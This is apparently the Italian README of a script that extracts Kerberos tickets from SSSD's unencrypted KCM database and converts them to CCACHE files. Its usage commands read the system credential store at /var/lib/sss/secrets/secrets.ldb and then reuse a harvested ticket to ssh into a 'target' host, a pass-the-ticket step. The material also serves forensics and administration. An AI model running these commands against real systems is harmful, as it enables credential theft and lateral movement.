
Estrai i ticket Kerberos dal database KCM di SSSD
Script rapido per esportare il database KCM utilizzato da SSSD e recuperare i ticket Kerberos nel formato CCACHE.
Inizialmente basato su SSSDKCMExtractor e KCMTicketFormatter.
Dalla versione 2.0.0 (2018-08-13), lo storage di backend del responder KCM di SSSD non cifra più il contenuto del database. Tuttavia, si basa ancora su un database LDB (a sua volta basato su TDB), che lo rende facilmente ricercabile tramite query simili a LDAP.
SSSD utilizza un formato di archiviazione personalizzato per i ticket Kerberos, che può essere convertito in file CCACHE standard utilizzando questo script.
$ apt install python3-construct python3-ldb
$ python3 kcmdump.py /var/lib/sss/secrets/secrets.ldb
$ ls -lh
-rw-r--r--. 1 root root 1.3K Jan 1 00:00 user_0.ccache
-rw-r--r--. 1 root root 1.8K Jan 1 00:00 kcmdump.py
$ KRB5CCNAME=user_0.ccache klist
$ KRB5CCNAME=user_0.ccache ssh [email protected]@target.corp.local